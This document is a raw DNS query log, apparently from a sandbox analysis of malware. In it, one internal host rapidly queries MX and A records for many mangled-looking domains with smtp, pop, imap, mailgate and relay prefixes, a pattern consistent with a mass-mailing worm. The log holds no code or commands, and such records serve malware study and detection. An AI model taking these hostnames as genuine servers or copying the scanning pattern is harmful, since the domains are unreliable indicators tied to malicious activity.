Nov 30, 2023 11:23:30.451082945 CET	192.168.2.4	1.1.1.1	0x2e12	Standard query (0)	mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.451296091 CET	192.168.2.4	1.1.1.1	0x4a58	Standard query (0)	aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.455535889 CET	192.168.2.4	1.1.1.1	0x396c	Standard query (0)	pop3.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.486479044 CET	192.168.2.4	1.1.1.1	0xa127	Standard query (0)	mailgate.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.504867077 CET	192.168.2.4	1.1.1.1	0x82e9	Standard query (0)	a5a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.523989916 CET	192.168.2.4	1.1.1.1	0xe66a	Standard query (0)	relay.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.551563025 CET	192.168.2.4	1.1.1.1	0x52ef	Standard query (0)	buuni8.cail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.569546938 CET	192.168.2.4	1.1.1.1	0xb8fa	Standard query (0)	a5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.569546938 CET	192.168.2.4	1.1.1.1	0x53a	Standard query (0)	ftp.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.572979927 CET	192.168.2.4	1.1.1.1	0x71ad	Standard query (0)	pop.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.577511072 CET	192.168.2.4	1.1.1.1	0x87c0	Standard query (0)	x02l.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.589427948 CET	192.168.2.4	1.1.1.1	0xbfb1	Standard query (0)	pop3.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.592808008 CET	192.168.2.4	1.1.1.1	0xf027	Standard query (0)	relay.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.625276089 CET	192.168.2.4	1.1.1.1	0x5271	Standard query (0)	buuni8.cail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.642177105 CET	192.168.2.4	1.1.1.1	0x2980	Standard query (0)	mail.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.646640062 CET	192.168.2.4	1.1.1.1	0x168a	Standard query (0)	g.sil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.685224056 CET	192.168.2.4	1.1.1.1	0x304f	Standard query (0)	8708aib.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.702786922 CET	192.168.2.4	1.1.1.1	0xaaf7	Standard query (0)	x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.704478979 CET	192.168.2.4	1.1.1.1	0xdb06	Standard query (0)	relay.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.705935955 CET	192.168.2.4	1.1.1.1	0x19	Standard query (0)	ftp.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.750669003 CET	192.168.2.4	1.1.1.1	0xa127	Standard query (0)	mailgate.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.750704050 CET	192.168.2.4	1.1.1.1	0x82e9	Standard query (0)	a5a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.760801077 CET	192.168.2.4	1.1.1.1	0xa12a	Standard query (0)	mail.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.769602060 CET	192.168.2.4	1.1.1.1	0xcc18	Standard query (0)	relay.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.801747084 CET	192.168.2.4	1.1.1.1	0x23b	Standard query (0)	g.sil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.807202101 CET	192.168.2.4	1.1.1.1	0x52ef	Standard query (0)	buuni8.cail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.811368942 CET	192.168.2.4	1.1.1.1	0xd31d	Standard query (0)	8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.819237947 CET	192.168.2.4	1.1.1.1	0xb8fa	Standard query (0)	a5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.827421904 CET	192.168.2.4	1.1.1.1	0x9f87	Standard query (0)	ssh.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.842159986 CET	192.168.2.4	1.1.1.1	0x415b	Standard query (0)	ssh.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.853549004 CET	192.168.2.4	1.1.1.1	0xec87	Standard query (0)	relay.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.883575916 CET	192.168.2.4	1.1.1.1	0xf4c6	Standard query (0)	mailgate.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.883819103 CET	192.168.2.4	1.1.1.1	0x5271	Standard query (0)	buuni8.cail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.889422894 CET	192.168.2.4	1.1.1.1	0x9270	Standard query (0)	ftp.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.926968098 CET	192.168.2.4	1.1.1.1	0x64cc	Standard query (0)	mail.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.927390099 CET	192.168.2.4	1.1.1.1	0x8c21	Standard query (0)	ftp.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.928114891 CET	192.168.2.4	1.1.1.1	0x9720	Standard query (0)	ftp.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.928385973 CET	192.168.2.4	1.1.1.1	0xca92	Standard query (0)	sil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.929238081 CET	192.168.2.4	1.1.1.1	0xcad7	Standard query (0)	ssh.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.951518059 CET	192.168.2.4	1.1.1.1	0xefc8	Standard query (0)	relay.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.959044933 CET	192.168.2.4	1.1.1.1	0x9f52	Standard query (0)	ftp.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.967042923 CET	192.168.2.4	1.1.1.1	0xfd1	Standard query (0)	nc.usoxekeovca.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.968274117 CET	192.168.2.4	1.1.1.1	0x62c6	Standard query (0)	relay.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.977382898 CET	192.168.2.4	1.1.1.1	0x28b9	Standard query (0)	mail.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.982368946 CET	192.168.2.4	1.1.1.1	0xb233	Standard query (0)	mail.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.012471914 CET	192.168.2.4	1.1.1.1	0x712	Standard query (0)	ssh.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.017393112 CET	192.168.2.4	1.1.1.1	0x1ece	Standard query (0)	imap.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.024440050 CET	192.168.2.4	1.1.1.1	0x95b2	Standard query (0)	ssh.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.026559114 CET	192.168.2.4	1.1.1.1	0x909f	Standard query (0)	pop3.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.042217970 CET	192.168.2.4	1.1.1.1	0x781f	Standard query (0)	pop.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.052450895 CET	192.168.2.4	1.1.1.1	0xd668	Standard query (0)	nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.081552982 CET	192.168.2.4	1.1.1.1	0x4581	Standard query (0)	ftp.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.109653950 CET	192.168.2.4	1.1.1.1	0x8584	Standard query (0)	mail.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.112797976 CET	192.168.2.4	1.1.1.1	0x802b	Standard query (0)	pop.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.114048004 CET	192.168.2.4	1.1.1.1	0xd4ba	Standard query (0)	relay.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.127185106 CET	192.168.2.4	1.1.1.1	0x54d0	Standard query (0)	pop.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.133943081 CET	192.168.2.4	1.1.1.1	0x1137	Standard query (0)	ssh.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.148978949 CET	192.168.2.4	1.1.1.1	0xe6a0	Standard query (0)	mail.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.181111097 CET	192.168.2.4	1.1.1.1	0xed6	Standard query (0)	imap.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.186455965 CET	192.168.2.4	1.1.1.1	0x4215	Standard query (0)	ssh.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.187711000 CET	192.168.2.4	1.1.1.1	0xfe08	Standard query (0)	mail.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.201778889 CET	192.168.2.4	1.1.1.1	0xefc8	Standard query (0)	relay.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.211277962 CET	192.168.2.4	1.1.1.1	0x7dcb	Standard query (0)	imap.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.216185093 CET	192.168.2.4	1.1.1.1	0x93c4	Standard query (0)	ftp.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.219749928 CET	192.168.2.4	1.1.1.1	0x95e4	Standard query (0)	ftp.aqh.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.276863098 CET	192.168.2.4	1.1.1.1	0x3ed0	Standard query (0)	imap.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.292454004 CET	192.168.2.4	1.1.1.1	0x909f	Standard query (0)	pop3.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.292478085 CET	192.168.2.4	1.1.1.1	0x1ece	Standard query (0)	imap.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.293955088 CET	192.168.2.4	1.1.1.1	0x781f	Standard query (0)	pop.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.295229912 CET	192.168.2.4	1.1.1.1	0x6dc9	Standard query (0)	relay.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.321310997 CET	192.168.2.4	1.1.1.1	0x65c6	Standard query (0)	ssh.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.323645115 CET	192.168.2.4	1.1.1.1	0x5149	Standard query (0)	pop.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.350152969 CET	192.168.2.4	1.1.1.1	0xae24	Standard query (0)	nksegrawioint.an	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.350450039 CET	192.168.2.4	1.1.1.1	0xcba4	Standard query (0)	centurylhrc.co	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.356981039 CET	192.168.2.4	1.1.1.1	0x3e8d	Standard query (0)	pop.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.358158112 CET	192.168.2.4	1.1.1.1	0xa787	Standard query (0)	pop.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.368063927 CET	192.168.2.4	1.1.1.1	0xd4ba	Standard query (0)	relay.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.417098045 CET	192.168.2.4	1.1.1.1	0x6f65	Standard query (0)	imap.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.425599098 CET	192.168.2.4	1.1.1.1	0xf77e	Standard query (0)	nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.426110029 CET	192.168.2.4	1.1.1.1	0x87cc	Standard query (0)	centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.450737953 CET	192.168.2.4	1.1.1.1	0xa923	Standard query (0)	ftp.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.459460974 CET	192.168.2.4	1.1.1.1	0xb752	Standard query (0)	imap.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.459825039 CET	192.168.2.4	1.1.1.1	0xa51d	Standard query (0)	smtp.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.462116003 CET	192.168.2.4	1.1.1.1	0x8a73	Standard query (0)	pop.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.463409901 CET	192.168.2.4	1.1.1.1	0x8559	Standard query (0)	mail.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.463717937 CET	192.168.2.4	1.1.1.1	0x29b6	Standard query (0)	pop3.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.475136995 CET	192.168.2.4	1.1.1.1	0x8c68	Standard query (0)	pop3.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.484354019 CET	192.168.2.4	1.1.1.1	0x95e4	Standard query (0)	ftp.aqh.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.500547886 CET	192.168.2.4	1.1.1.1	0x4ccd	Standard query (0)	pop.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.506166935 CET	192.168.2.4	1.1.1.1	0x399c	Standard query (0)	imap.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.524233103 CET	192.168.2.4	1.1.1.1	0xf4b2	Standard query (0)	mailgate.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.525285006 CET	192.168.2.4	1.1.1.1	0x7c19	Standard query (0)	ssh.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.537198067 CET	192.168.2.4	1.1.1.1	0x3b1a	Standard query (0)	imap.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.538887024 CET	192.168.2.4	1.1.1.1	0xf30d	Standard query (0)	imap.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.542458057 CET	192.168.2.4	1.1.1.1	0xdaab	Standard query (0)	mailgate.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.544189930 CET	192.168.2.4	1.1.1.1	0xb10f	Standard query (0)	pop.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.547653913 CET	192.168.2.4	1.1.1.1	0x87a5	Standard query (0)	mailgate.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.564511061 CET	192.168.2.4	1.1.1.1	0x424d	Standard query (0)	pop3.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.572237968 CET	192.168.2.4	1.1.1.1	0x70e6	Standard query (0)	mailgate.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.590327978 CET	192.168.2.4	1.1.1.1	0x838b	Standard query (0)	pop3.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.603396893 CET	192.168.2.4	1.1.1.1	0x40d	Standard query (0)	smtp.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.630610943 CET	192.168.2.4	1.1.1.1	0xfe0c	Standard query (0)	smtp.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.681474924 CET	192.168.2.4	1.1.1.1	0x260c	Standard query (0)	ftp.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.697155952 CET	192.168.2.4	1.1.1.1	0xbc0a	Standard query (0)	ftp.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.705553055 CET	192.168.2.4	1.1.1.1	0xa51d	Standard query (0)	smtp.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.706231117 CET	192.168.2.4	1.1.1.1	0xd73e	Standard query (0)	pop3.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.791481018 CET	192.168.2.4	1.1.1.1	0x4ccd	Standard query (0)	pop.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.795213938 CET	192.168.2.4	1.1.1.1	0x6886	Standard query (0)	mail.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.796861887 CET	192.168.2.4	1.1.1.1	0x1f72	Standard query (0)	ssh.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.798286915 CET	192.168.2.4	1.1.1.1	0x5759	Standard query (0)	mail.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.798413992 CET	192.168.2.4	1.1.1.1	0xdaab	Standard query (0)	mailgate.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.800057888 CET	192.168.2.4	1.1.1.1	0x694f	Standard query (0)	smtp.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.802654028 CET	192.168.2.4	1.1.1.1	0xdc0b	Standard query (0)	ssh.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.811551094 CET	192.168.2.4	1.1.1.1	0x52ef	Standard query (0)	buuni8.cail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.811626911 CET	192.168.2.4	1.1.1.1	0x70e6	Standard query (0)	mailgate.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.834146023 CET	192.168.2.4	1.1.1.1	0x2b78	Standard query (0)	smtp.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.838886023 CET	192.168.2.4	1.1.1.1	0x973b	Standard query (0)	smtp.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.883909941 CET	192.168.2.4	1.1.1.1	0xd87b	Standard query (0)	pop.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.887923956 CET	192.168.2.4	1.1.1.1	0xdbae	Standard query (0)	pop3.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.887923956 CET	192.168.2.4	1.1.1.1	0x5271	Standard query (0)	buuni8.cail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.903300047 CET	192.168.2.4	1.1.1.1	0xd03e	Standard query (0)	mailgate.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.917642117 CET	192.168.2.4	1.1.1.1	0xbbdc	Standard query (0)	mailgate.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.919258118 CET	192.168.2.4	1.1.1.1	0x7e2e	Standard query (0)	smtp.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.920186996 CET	192.168.2.4	1.1.1.1	0xf5b0	Standard query (0)	smtp.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.929970026 CET	192.168.2.4	1.1.1.1	0xc17f	Standard query (0)	imap.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.931051016 CET	192.168.2.4	1.1.1.1	0x468a	Standard query (0)	relay.8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.932306051 CET	192.168.2.4	1.1.1.1	0x98fe	Standard query (0)	mailgate.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.939296007 CET	192.168.2.4	1.1.1.1	0x2769	Standard query (0)	pop3.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.939707994 CET	192.168.2.4	1.1.1.1	0x65d7	Standard query (0)	smtp.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.942168951 CET	192.168.2.4	1.1.1.1	0xef06	Standard query (0)	relay.n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.942552090 CET	192.168.2.4	1.1.1.1	0x53b8	Standard query (0)	relay.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.945529938 CET	192.168.2.4	1.1.1.1	0x2d80	Standard query (0)	pop3.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.951428890 CET	192.168.2.4	1.1.1.1	0xb7bb	Standard query (0)	pop3.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.955013037 CET	192.168.2.4	1.1.1.1	0x2596	Standard query (0)	mailgate.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.962306023 CET	192.168.2.4	1.1.1.1	0x110f	Standard query (0)	mailgate.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.962306023 CET	192.168.2.4	1.1.1.1	0x659c	Standard query (0)	mailgate.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.995630980 CET	192.168.2.4	1.1.1.1	0x6c58	Standard query (0)	pop.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.001236916 CET	192.168.2.4	1.1.1.1	0x276d	Standard query (0)	pop.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.007672071 CET	192.168.2.4	1.1.1.1	0x67dc	Standard query (0)	relay.hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.013266087 CET	192.168.2.4	1.1.1.1	0x471	Standard query (0)	imap.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.013839006 CET	192.168.2.4	1.1.1.1	0xea9c	Standard query (0)	imap.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.020894051 CET	192.168.2.4	1.1.1.1	0xf9ac	Standard query (0)	smtp.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.051196098 CET	192.168.2.4	1.1.1.1	0x1066	Standard query (0)	smtp.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.055202007 CET	192.168.2.4	1.1.1.1	0x47e5	Standard query (0)	smtp.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.056934118 CET	192.168.2.4	1.1.1.1	0x4719	Standard query (0)	relay.ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.075062037 CET	192.168.2.4	1.1.1.1	0xd31e	Standard query (0)	relay.mr.r.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.188594103 CET	192.168.2.4	1.1.1.1	0x69ed	Standard query (0)	relay.8708aib.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.213886976 CET	192.168.2.4	1.1.1.1	0x2d80	Standard query (0)	pop3.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.217838049 CET	192.168.2.4	1.1.1.1	0x659c	Standard query (0)	mailgate.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.317970037 CET	192.168.2.4	1.1.1.1	0x935c	Standard query (0)	mailgate.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.382302999 CET	192.168.2.4	1.1.1.1	0xc6f	Standard query (0)	pop3.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.383747101 CET	192.168.2.4	1.1.1.1	0x48d	Standard query (0)	pop3.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.446046114 CET	192.168.2.4	1.1.1.1	0x74c6	Standard query (0)	mailgate.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.447597980 CET	192.168.2.4	1.1.1.1	0x1ead	Standard query (0)	mailgate.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.455192089 CET	192.168.2.4	1.1.1.1	0xd4d0	Standard query (0)	relay.x02l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.462716103 CET	192.168.2.4	1.1.1.1	0x63cd	Standard query (0)	pop3.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.463990927 CET	192.168.2.4	1.1.1.1	0xf13e	Standard query (0)	relay.aieicod0003l.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.518785954 CET	192.168.2.4	1.1.1.1	0xf9f4	Standard query (0)	fyn.5idsevoeuliva0aafmail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:32.551239014 CET	192.168.2.4	1.1.1.1	0x1f7a	Standard query (0)	fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.572191000 CET	192.168.2.4	1.1.1.1	0x21ce	Standard query (0)	relay.nc.usoxekeovca.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.591533899 CET	192.168.2.4	1.1.1.1	0x79f1	Standard query (0)	relay.centurylhrc.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.597230911 CET	192.168.2.4	1.1.1.1	0x5d9c	Standard query (0)	relay.nksegrawioint.an	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.718961000 CET	192.168.2.4	1.1.1.1	0xdf06	Standard query (0)	ftp.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.720575094 CET	192.168.2.4	1.1.1.1	0x75b9	Standard query (0)	mail.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.751087904 CET	192.168.2.4	1.1.1.1	0xdd2f	Standard query (0)	ssh.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.817842960 CET	192.168.2.4	1.1.1.1	0xb223	Standard query (0)	relay.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.927007914 CET	192.168.2.4	1.1.1.1	0x3c03	Standard query (0)	m4242ail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:32.932754040 CET	192.168.2.4	1.1.1.1	0xa22d	Standard query (0)	m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.936335087 CET	192.168.2.4	1.1.1.1	0xf34c	Standard query (0)	pop.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.938715935 CET	192.168.2.4	1.1.1.1	0xb210	Standard query (0)	imap.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:32.943515062 CET	192.168.2.4	1.1.1.1	0x5b0c	Standard query (0)	smtp.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.058356047 CET	192.168.2.4	1.1.1.1	0xb223	Standard query (0)	relay.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.081563950 CET	192.168.2.4	1.1.1.1	0x2e83	Standard query (0)	ftp.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.083884001 CET	192.168.2.4	1.1.1.1	0x70c1	Standard query (0)	mail.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.086452007 CET	192.168.2.4	1.1.1.1	0x4ef4	Standard query (0)	ssh.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.092233896 CET	192.168.2.4	1.1.1.1	0xb17f	Standard query (0)	mailgate.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.127209902 CET	192.168.2.4	1.1.1.1	0x7772	Standard query (0)	pop3.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
